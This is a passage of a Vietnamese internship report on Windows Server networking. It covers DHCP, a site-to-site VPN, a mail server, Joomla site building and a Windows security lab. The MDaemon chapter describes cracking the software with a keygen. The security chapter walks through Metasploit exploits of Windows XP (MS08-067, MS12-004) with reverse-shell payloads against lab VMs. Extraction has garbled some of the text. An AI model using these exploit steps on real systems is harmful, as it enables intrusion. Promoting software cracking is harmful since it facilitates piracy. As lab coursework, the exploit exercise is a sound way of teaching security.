Administrative ToolsDHCP.

Nhấ IPv4 và New Scope.

New Scope Next.

-

Scope Name và ục Name và nhấn Next.


64


- IP Address Range

Next.

- Lease Duration


65


- Configuration DHCP Options

. Ở No, I will configure

these option later và nhấn Next.

Bấm Fisnish để kết thúc

3.2 Thay đổi options của Scope

- scope optionsConfigure Options.

-

.

- Router

.


66


Kiểm tra

CHƢƠNG 8: TRIỂN KHAI VPN

I. Tìm hiểu VPN

Giải pháp VPN (Virtual Private Network) đƣợc thiết kế cho những tổ chức

có xu hƣớng tăng cƣờng thông tin từ xa vì địa bàn hoạt động rộng (trên toàn quốc

hay toàn cầu). Tài nguyên ở trung tâm có thể kết nối đến từ nhiều nguồn nên tiết

kiệm đƣợc đƣợc chi phí và thời gian.


67


Một mạng VPN điển hình bao gồm mạng LAN chính tại trụ sở (Văn phòng

chính), các mạng LAN khác tại những văn phòng từ xa, các điểm kết nối (nhƣ 'Văn

phòng' tại gia) hoặc ngƣời sử dụng (Nhân viên di động) truy cập đến từ bên ngoài.

1. Khái niệm.

Mạng riêng ảo hay VPN (Virtual Private Network) là một mạng dành riêng

để kết nối các máy tính lại với nhau thông qua mạng Internet công cộng. Những

máy tính tham gia mạng riêng ảo sẽ "nhìn thấy nhau" nhƣ trong một mạng nội bộ -

LAN (Local Area Network).

Internet là một môi trƣờng công cộng, việc chia sẻ dữ liệu có tính riêng tƣ

thông qua Internet là cực kỳ nguy hiểm vì những dữ liệu đó có thể dễ dàng bị rò rỉ,

bị ăn cắp... Mạng riêng ảo là giao thức trợ giúp việc kết nối các máy tính lại với

nhau thông qua một kênh truyền dẫn dữ liệu (tunel) riêng đã đƣợc mã hóa.

Mạng riêng ảo giúp bảo vệ dữ liệu trong khi chúng đƣợc truyền trên Internet

vì vậy mạng riêng ảo thƣờng đƣợc ứng dụng trong các trƣờng hợp sau:

Làm việc từ xa: Truy cập từ xa thông qua Internet vào mạng của công ty để

chia sẻ dữ liệu cũng nhƣ thực thi các ứng dụng nội bộ.

Kết nối nhiều mạng với nhau (Site-to-Site): Nếu công ty có nhiều văn

phòng, việc kết nối các mạng lại với nhau thành một mạng thống nhất sẽ đem lại

hiệu quả ấn tƣợng trong việc quản lý & chia sẻ thông tin.

Tạo phiên làm việc an toàn: Mạng riêng ảo là giải pháp tốt & với chi phí

thấp cho một số công việc đòi hỏi tính bảo mật cao nhƣ quản trị máy chủ, website,

cơ sở dữ liệu...


68


Nếu thƣờng xuyên làm việc trên Internet & thông tin là tài sản vô giá, bạn

nên ứng dụng mạng riêng ảo vào công việc của mình.

2. Các loại VPN.

Có hai loại phổ biến hiện nay là VPN truy cập từ xa (Remote-Access ) và

VPN điểm-nối-điểm (site-to-site)

VPN truy cập từ xa còn đƣợc gọi là mạng Dial-up riêng ảo (VPDN), là một

kết nối ngƣời dùng-đến-LAN, thƣờng là nhu cầu của một tổ chức có nhiều nhân

viên cần liên hệ với mạng riêng của mình từ rất nhiều địa điểm ở xa. Ví dụ nhƣ

công ty muốn thiết lập một VPN lớn phải cần đến một nhà cung cấp dịch vụ doanh

nghiệp (ESP). ESP này tạo ra một máy chủ truy cập mạng (NAS) và cung cấp cho

những ngƣời sử dụng từ xa một phần mềm máy khách cho máy tính của họ. Sau

đó, ngƣời sử dụng có thể gọi một số miễn phí để liên hệ với NAS và dùng phần

mềm VPN máy khách để truy cập vào mạng riêng của công ty. Loại VPN này cho

phép các kết nối an toàn, có mật mã.

Hình minh họa cho thấy kết nối giữa Văn phòng chính và "Văn phòng" tại

gia hoặc nhân viên di động là loại VPN truy cập từ xa).

VPN điểm-nối-điểm là việc sử dụng mật mã dành cho nhiều ngƣời để kết

nối nhiều điểm cố định với nhau thông qua một mạng công cộng nhƣ Internet. Loại

này có thể dựa trên Intranet hoặc Extranet. Loại dựa trên Intranet: Nếu một công ty

có vài địa điểm từ xa muốn tham gia vào một mạng riêng duy nhất, họ có thể tạo ra

một VPN intranet (VPN nội bộ) để nối LAN với LAN. Loại dựa trên Extranet: Khi

một công ty có mối quan hệ mật thiết với một công ty khác (ví dụ nhƣ đối tác cung

cấp, khách hàng...), họ có thể xây dựng một VPN extranet (VPN mở rộng) kết nối

LAN với LAN để nhiều tổ chức khác nhau có thể làm việc trên một môi trƣờng

chung.

Trong hình minh họa trên, kết nối giữa Văn phòng chính và Văn phòng từ xa

là loại VPN Intranet, kết nối giữa Văn phòng chính với Đối tác kinh doanh là VPN

Extranet.

3.Bảo mật trong VPN

Tƣờng lửa (firewall) là rào chắn vững chắc giữa mạng riêng và Internet. Bạn

có thể thiết lập các tƣờng lửa để hạn chế số lƣợng cổng mở, loại gói tin và giao

thức đƣợc chuyển qua. Một số sản phẩm dùng cho VPN nhƣ router 1700 của Cisco

có thể nâng cấp để gộp những tính năng của tƣờng lửa bằng cách chạy hệ điều


69


hành Internet Cisco IOS thích hợp. Tốt nhất là hãy cài tƣờng lửa thật tốt trƣớc khi

thiết lập VPN.

Mật mã truy cập là khi một máy tính mã hóa dữ liệu và gửi nó tới một máy

tính khác thì chỉ có máy đó mới giải mã đƣợc. Có hai loại là mật mã riêng và mật

mã chung.

Mật mã riêng (Symmetric-Key Encryption): Mỗi máy tính đều có một mã bí

mật để mã hóa gói tin trƣớc khi gửi tới máy tính khác trong mạng. Mã riêng yêu

cầu bạn phải biết mình đang liên hệ với những máy tính nào để có thể cài mã lên

đó, để máy tính của ngƣời nhận có thể giải mã đƣợc.

Mật mã chung (Public-Key Encryption) kết hợp mã riêng và một mã công

cộng. Mã riêng này chỉ có máy của bạn nhận biết, còn mã chung thì do máy của

bạn cấp cho bất kỳ máy nào muốn liên hệ (một cách an toàn) với nó. Để giải mã

một message, máy tính phải dùng mã chung đƣợc máy tính nguồn cung cấp, đồng

thời cần đến mã riêng của nó nữa. Có một ứng dụng loại này đƣợc dùng rất phổ

biến là Pretty Good Privacy (PGP), cho phép bạn mã hóa hầu nhƣ bất cứ thứ gì.

Giao thức bảo mật giao thức Internet (IPSec) cung cấp những tính năng an

ninh cao cấp nhƣ các thuật toán mã hóa tốt hơn, quá trình thẩm định quyền đăng

nhập toàn diện hơn.

IPSec có hai cơ chế mã hóa là Tunnel và Transport. Tunnel mã hóa tiêu đề

(header) và kích thƣớc của mỗi gói tin còn Transport chỉ mã hóa kích thƣớc. Chỉ

những hệ thống nào hỗ trợ IPSec mới có thể tận dụng đƣợc giao thức này. Ngoài

ra, tất cả các thiết bị phải sử dụng một mã khóa chung và các tƣờng lửa trên mỗi hệ

thống phải có các thiết lập bảo mật giống nhau. IPSec có thể mã hóa dữ liệu giữa

nhiều thiết bị khác nhau nhƣ router với router, firewall với router, PC với router,

PC với máy chủ.

Máy chủ AAA

AAA là viết tắt của ba chữ Authentication (thẩm định quyền truy cập),

Authorization (cho phép) và Accounting (kiểm soát). Các server này đƣợc dùng để

đảm bảo truy cập an toàn hơn. Khi yêu cầu thiết lập một kết nối đƣợc gửi tới từ

máy khách, nó sẽ phải qua máy chủ AAA để kiểm tra. Các thông tin về những hoạt

động của ngƣời sử dụng là hết sức cần thiết để theo dõi vì mục đích an toàn.


70


4.Sản phẩm công nghệ dành cho VPN

Tùy vào loại VPN (truy cập từ xa hay điểm-nối-điểm), bạn sẽ cần phải cài

đặt những bộ phận hợp thành nào đó để thiết lập mạng riêng ảo. Đó có thể là:

- Phần mềm cho desktop của máy khách dành cho ngƣời sử dụng từ xa.

- Phần cứng cao cấp nhƣ bộ xử lý trung tâm VPN hoặc firewall bảo mật

PIX.

- Server VPN cao cấp dành cho dịch vụ Dial-up.

- NAS (máy chủ truy cập mạng) do nhà cung cấp sử dụng để phục vụ ngƣời

sử dụng từ xa.

- Mạng VPN và trung tâm quản lý.

5. Bộ xử lý trung tâm VPN

Có nhiều loại máy xử lý VPN của các hãng khác nhau, nhƣng sản phẩm của

Cisco tỏ ra vƣợt trội ở một số tính năng. Tích hợp các kỹ thuật mã hóa và thẩm

định quyền truy cập cao cấp nhất hiện nay, máy xử lý VPN đƣợc thiết kế chuyên

biệt cho loại mạng này. Chúng chứa các module xử lý mã hóa SEP, cho phép

ngƣời sử dụng dễ dàng tăng dung lƣợng và số lƣợng gói tin truyền tải. Dòng sản

phẩm có các model thích hợp cho các mô hình doanh nghiệp từ nhỏ đến lớn (từ100

cho đến 10.000 điểm kết nối từ xa truy cập cùng lúc).

Bộ xử lý trung tâm VPN số hiệu 3000 của hãng Cisco.

6. Router dùng cho VPN

Thiết bị này cung cấp các tính năng truyền dẫn, bảo mật. Dựa trên hệ điều

hành Internet IOS của mình, hãng Cisco phát triển loại router thích hợp cho mọi

trƣờng hợp, từ truy cập nhà-tới-văn phòng cho đến nhu cầu của các doanh nghiệp

quy mô lớn.


71


7. Tƣờng lửa PIX của Cisco

Firewall trao đổi Internet riêng (Private Internet Exchange) bao gồm một cơ

chế dịch địa chỉ mạng rất mạnh, máy chủ proxy, bộ lọc gói tin, các tính năng VPN

và chặn truy cập bất hợp pháp.

Thay vì dùng IOS, thiết bị này có hệ điều hành với khả năng tổ chức cao,

xoay sở đƣợc với nhiều giao thức, hoạt động rất mạnh bằng cách tập trung vào IP.

II.VPN SITE TO SITE

1 . Yêu cầu

2 máy server + 2 máy client

Card Lan Card Cross

Server 1 10.0.0.1/24 192.168.1.1/24

Server 2 172.16.1.1/24 192.168.1.2/24

Client 1 10.0.0.2/24

Client 2 172.16.1.2/24

Tạo user saigon trên máy server 1

Tạo user hanoi trên máy server 2


72


2. Cài đặt

Chọn properties ->chọn tab dial – in -> check chọn allow access


73


Trên máy server1

Vào server manager ->add roles

Chọn network policy and access services -> next


74


Chọn routing and remote access services -> next

Nhƣ vậy là đã cài xong giờ đi cấu hình


75


Vào start -> administrative ->routing and remote access

Chọn server -> click phải configure


76


Chọn Custom configuration -> next

Chọn VPN access + Demand – dial connections + Lan routing -> next


77


Chọn start service

Chọn tab Network interface -> click phải chọn new demand-dial interface


78


Nhập interface name : saigon -> next

Check connect using vitual private networking (VPN) ->next


79


Check chọn point to point -> next

Nhập địa chỉ ip card CROSS của máy server2 -> next


80


Check chọn route ip + adda user account

Add static route 172.16.2.0 (đƣờng mạng LAN của máy server2) -> next


81


Nhập password của user saigon mình đã tạo ban đầu -> next

Nhập user name :hanoi

Password của user hanoi mình đã tạo ban đầu -> next


82


Chọn properties server

Chọn tab IPv4 và add vào chuỗi địa chỉ ip sẽ nhận khi connect vào


83


Apply + OK

Properties network interface saigon vừa tạo


84


Chọn tab L2Tp ipsec VPN và nhập key


85


Properties server chọn tab security -> check chọn allow custom IP sec policy for

L2TP connection -> Apply -> OK

Click phải network interface saigon ở server1 -> chọn connect


86


Click phải network interface hanoi ở server2 -> chọn connect

Xem kết quả connected rồi qua máy client 1 ping máy client 2 và ngƣợc lại để xem

kết quả.


87


CHƢƠNG 9: MAIL TRÊN VPS.

I. Đăng ký Domain

Ta truy cập vào dot.tk để đăng ký domain

Sau khi chọn xong domain ta click GO.Click vào sử dụng DNS, chọn tab Dịch Vụ

DNS của Dot.tk, nhập

IP của VPS vào 2 hàng địa chỉ IP

Sau đó chọn thời gian duy trì domain


88


Nhập ký tự để xác nhận là ngƣời sử dụng chứ không phải robot, rồi click : ĐĂNG

KÝ

Lựa chọn tài khoản quản lý tên miền:


89


Click “Đăng nhập vào My Dot” để tùy chỉnh các thông số cho domain

Sau khi đăng nhập vào my.dot.tk. Ta click vào Go to domain hoặc Domain panel

để vào danh sách các domain đã đăng ký.

Lựa chọn domain cần đăng lý sau đó click Modify:


90


Ta tạo thêm 2 record là mail.vanhuynhtt5.tk và MX Record là mail.vanhuynhtt5.tk

Cuối cùng là Save Changes.


91


II Mail Server Mdaemon

1 Định Nghĩa:

Mail Server là một máy chủ cung cấp dịch vụ viết gửi và nhận thƣ trên

internet.

Để tạo 1 mail server thì có nhiều phần mềm , nhƣng nổi tiếng nhất đó là

Mdaemon.

2 Các bƣớc chuẩn bị:

1VPS làm Mail Server

Phần mềm Mdaemon bản pro

1 Domain đã add record (MX record).

3 Tiến hành:

Trên máy VPS ta cài Mdaemon và crack thành bản pro (vì bản pro mới cho

phép gởi và nhận mail từ các dịch vụ mail khác, con bản free chỉ cho gởi

mail nội bộ)

Cách cài Mdaemon Pro:

Ta chạy file setup MDv10.exe

Điền Lience name : vanhuynhtt5(tùy chọn)

Company name: Tên Công Ty

Registration Key: Ta lấy trong keygen ở thƣ mục crack


92


Copy dãy chữ số này paste vào Registration Key Sau khi paste key vào ta click

Next.Lƣu ý không check vào Install the Limited.

Đợi quá trình cài đặt hoàn tất


93


Điền domain (mà ta đã đang ký ở dot.tk lúc nãy vào) Domain name

Điền vào tên và địa chỉ mail cũng nhƣ mật khẩu cho tài khoảng admin


94


Điền vào IP của VPS :

Click Next


95


Ta bỏ dầu check( Không chọn vào) ở “Start MDAEMON”

Copy file Mdaemon.exe trong thƣ mục crack vào thƣ mục cài đặt Mdaemon

(C:\Mdaemon\apps) rồi khởi động Mdeamon


96


Click Yes

Ta khỏi động Mdaemon lên rồi tạo User mail

Ta vào Account>>New Account để tạo users


97


Ta tạo User huynh:

Test khả năng gởi và nhận mail

Trên server ta đăng nhập tài khoản Admin


98



99


Điền vào IP của Mail Server


100


Trên win 7 ta khởi động windows mail. Tiến hành add tài khoản huynh vào để

kiểm tra khả năng gửi thƣ nội bộ.


101


Điền vào ip của Mail Server

Đăng nhập tài khoản huynh


102


Trên mail server ta dùng tài khoản admin gởi mail cho win 7 tài khoản huynh


103


Trên máy win 7 đã nhận đƣợc mail của máy Server Mail

Ta gửi mail từ máy win7 qua máy Server Mail


104


Server mail đã nhận đƣợc mail từ win 7

Ta tiếp tục dùng Server mail gửi cho Gmail là [email protected]

mailto:[email protected]


105


Trên Gmail đã nhận đƣợc mail của Server mail


106


Cuối cùng ta gửi từ Gmail cho Server mail:

Server mail đã nhận đƣợc mail của Gmail:


107


CHƢƠNG 10: WEB TRÊN VPS

I. Cài đặt.

1. Chạy xampp.

Chạy file.exe -> run.


108


Chọn Install.


109


Sau khi chạy xong Running Apache voi MySql -> tick vào Admin.


110


Nhập joomla vào chọn Creation.

Thành công


111


2. Tạo xampp.

Copy source joomla pass vào hdots và đổi tên là Athena.


112



113


CHƢƠNG 11: THIẾT KẾ WEB BẰNG JOOMLA.


114


I .Cài đặt joomla.

Copy file joomla2.5 vào c:\xampp\htdocs


115


Giải nén và đổi tên thành weddoanhnghiep


116


Tạo database weddoanhngiep

Chọn ngôn ngữ English >>Next


117


Tiếp theo chọn Next



118





119


Gỡ bỏ hoàn toàn thƣ mục

Tạo thành công webdoanhnghiep


120


II. Cài đặt template joomla 2.5

Tạo Username và Passwork

Vào Extensions chọn Extensions Manager


121


Upload file Athena lên

Vào Extensions chọn Templare Manager


122


Chọn Athena-default

Login tài khoản


123


III. Tạo bài viết trong joomla

Vô content chọn Artcle Manager

Chọn New


124


Ghi tile

Vô conteint chọn Calagory Manager


125


Ghi tile

Vô conteint chọn Article > Add new


126


Ghi tile

Save lại


127


IV. Tạo menu trong joomla

Vô menu chọn main menu > add menu

Điền Menu tile : Trang chủ .Save và New


128


Điền tiếp status,access…

Save lại


129


Tƣơng tự.Menu tile Giới thiệu

Save lại


130


Menu tile Tin tức Đào tạo

Save lại


131


Menu tile Diễn đàn Athena

Save lại


132


V. Đƣa menu ra trang chủ

Vô Extensions chọn Module Manager

Chọn New


133


Làm tile và status

Kết quả ra .


134


VI. Cài đặt và hiển thị module

Vô Content chọn Media manager

Tiếp


135


Vô Extensions Chọn Extension Manager

Tải tệp lên


136


Đã xong .

Vô Extensions chọn Module manager


137


Điền tile

Add a slide


138


Chọn tệp tải lên

Tiếp tục


139


Vô Extensions chọn Temlate Manager

Sửa Temlate Manager


140


Save và close

Hiển thị dao diện


141


Save lại

Ra dao diện

VI.


142


VII. Cài đặt và hiển thị module tin tức mới nhất

Vô Extensions chọn Extension manager

Upload file lên


143


Vô Extensions chọn Module manager

Chọn New


144


Làm tile

Kết quả làm


145


Hiển thị thành công

VIII. Cài đặt và hiển thị module danh mục tin tức



146


Uploade file

Vô Extensions chọn module manager


147


Chọn Sj Mega News

Save lại


148



Upload file plg-sytem


149


Vô Extensions Chọn Plugin manager

Chọn System-sjcore


150


Ra giao diện

IX. Sử dụng Module custom

Vô Extensions Chọn module Manager


151


Chọn Custom html

Tạo tile và lƣu lại


152


Hiển thị

X. Tích hợp footer vào wedsite


153


Vô Extensions chọn module manager

Chọn cutom html


154


Tile footer và save

Kết quả

XI. Backup và retore


155


Tạo Database

Tích vô SQL và Go


156


Chọn tệp cần retore

Kết quả


157


CHƢƠNG 12: BẢO MẬT WINDOWS.

I.Khai thác lỗ hổng trên Windows XP với mã lỗi ms08_067

Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn

công nạn nhân)

Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là:

192.168.154.128

Các bƣớc thực hiện:

Kiểm tra mạng giữa XP và máy Back Track 5r3:

Máy Back Track 5r3:

Máy Xp:

Kiểm tra thông mạng:


158


Trên máy Back track 5r3 ta gõ đƣờng dẫn:

cd /pentest/exploits/framework

Ta tiếp tục gõ lệnh:

./msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129

LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp E


159


Trong đó RHOST là IP máy Xp, LHOST là IP máy Back track 5r3.

Sau đó, ta chờ cho máy Back track 5r3 tấn công Xp

Cuối cùng ta đã tấn công đƣợc Xp, ta biết đƣợc các thông số của máy XP

Link tham khảo: https://www.youtube.com/watch?v=n5tNl4vp6V0&hd=1


160


Link tham khảo: https://www.youtube.com/watch?v=n5tNl4vp6V0&hd=1

II.Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004

Máy Backtrack 5r3 có IP là 192.168.1.2, máy xp có IP là 192.168.1.3

Trên máy Back track vào chƣơng trình terminal và gõ lệnh msfconsole

Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004


161


Sau khi seach đƣợc mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm đƣợc.

Dùng lệnh show options để biết thêm các câu lệnh cần thiết.


162


Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>

Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp


163


Dùng lệnh set LHOST <ip backtrack>

Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đƣờng dẫn

http://192.168.1.2:8080/nếu máy nạn nhân vào đƣờng dẫn này sẽ bị hack.

Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là

192.168.1.3

Trên máy XP ta vào trình duyệt web và gõ đƣờng dẫnhttp://192.168.1.2:8080/

http://192.168.147.130/

http://192.168.147.130/


164


Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ

Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó.

Trên máy back track ta gõ lệnh sessions để kiểm tra.


165


Dùng lệnh sessions –i 1

Xem trƣớc thông tin XP:

Trên máy backtrack gõ getuid để biết thông tin máy Xp, và tài khoản đang truy

cập.


166


Gõ sysinfo để biết thông tin chi tiết máy Xp:

Gõ lệnh shell để vào ổ đĩa máy XP:

Giờ thì ta có thể xem đƣợc các file trong ổ đĩa của máy XP.

CHƢƠNG 13: KẾT LUẬN

I.Các kết quả đạt đƣợc.

Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em đã có kiến

thức về:

- Nguyên lý cơ bản của hệ điều hành mạng, ứ ạng, có kỹ năng cần

thiết để cài đặ ỉnh mạng doanh nghiệp cỡ vừa và lớn dựa vào Windows

Server 2008.


167


- Hiểu về cấu trúc hạ tầng, thiết kế và quản trị hệ thống mạ ụ quả

ợ .

- Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống mạng.

- Có các kiến thức trên nền tảng công nghệ Windows Server 2008.

II.Kinh nghiệm thực tế

Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của một doanh

nghiệp thông qua nền tảng.

Đƣợc trực tiếp tiếp xúc những công nghệ và thiết bị mà trƣớc đây chỉ biết đến

thông qua sách vở.

Đƣợc vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.

Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học trên lớp.

Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.

Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.

III. Hoàn thiện bản thân

Các thành viên trong nhóm đã định hƣớng rõ ràng mục tiêu sắp tới sẽ làm.

Tự tin hơn trong việc giao tiếp với mọi ngƣời trong công việc.

Nâng cao khả năng làm việc nhóm cũng nhƣ khả năng tự bản thân giải quyết vấn

đề khó khăn gặp phải trong công việc.

IV.Các kiến thức đƣợc lĩnh hội

Kiến thức thực tế về hệ thống mạng của doanh nghiệp.

Hiểu các thành phần công nghệ mạng doanh nghiệp vừa và nhỏ.

V. Kết luận.

Nhìn chung các công việc em đã cơ bản hoàn thành, tuy nhiên sẽ còn nhiều thiếu sót, đa

phần là quá trình tự học. Vì thế mong Thầy cô, các bạn đánh giá và đƣa ra những ý kiến

đóng góp để khắc phục và sữa chữa. Bênh cạnh trình độ chuyên mông cũng cần có những

kỹ năng mềm nhƣ kỹ năng giao tiếp, làm việc nhóm cũng hết sức quan trọng. Thực tập là

giai đoạn quan trọng của sinh viên, giúp sinh viên có cơ hội làm việc thực tế nhằm củng

cố kĩ năng, chuẩn bị cho giai đoạn làm việc thật sau khi tốt nghiệp.Trong quá trình thực

tập tại Trung tâm ATHENA, nhóm chúng em đƣợc tiếp xúc với một môi trƣờng làm việc


168


chuyên nghiệp, các công nghệ, thiết bị,các mô hình thực tế... Qua đó nhóm học hỏi đƣợc

những kinh nghiệm nhất định và có những suy nghĩ đóng góp sau:

Về công việc: Để thiết kế và triển khai một hệ thống mạng cho một công ty, cần

có nhiều bộ phận phối hợp với nhau để thực hiện và hoàn thành dự án.

Về phát triển kỹ năng:Để các bộ phận có thể phối hợp tốt mỗi nhân viên cần có

những kỹ năng cơ bản để làm việc trong đội, nhóm:

o Làm việc nhóm: Kỹ năng làm việc nhóm là khả năng làm việc hiệu quả trong đội ngũ. Đó

là việc có thể sử dụng đúng ngƣời để có đƣợc kết quả tốt nhất và luôn sẵn sàng để có thể

lãnh đạo hoặc phối hợp làm theo.

o Tìm hiểu – thu thập thông tin: Quản lý thông tin là khả năng biết đƣợc nơi để có đƣợc

thông tin cần thiết - để tìm kiếm, định vị, và thu thập nó. Điều này có thể liên quan đến

việc sử dụng các nguồn lực khác nhau, cho dù chúng là từ những con ngƣời hoặc từ các

tài liệu trong thế giới rộng lớn của công nghệ

o Kỹ năng giải quyết vấn đề - Tính linh hoạt : Tính linh hoạt là khả năng thích nghi để giải

quyết công việc chúng ta gặp phải hàng ngày trong công việc lẫn đời sống riêng. Giải

quyết vấn đề là xác định vấn đề, nghiên cứu giải pháp và đƣa ra những quyết định hiệu

quả.

Về công nghệ: với lợi thế là công ty hoạt động trong lĩnh vực công nghệ thông

tin ,ATHENA có hạ tầng CNTT hiện đại ,an toàn và thông suốt

Art & Photos

báo cáo cuối kì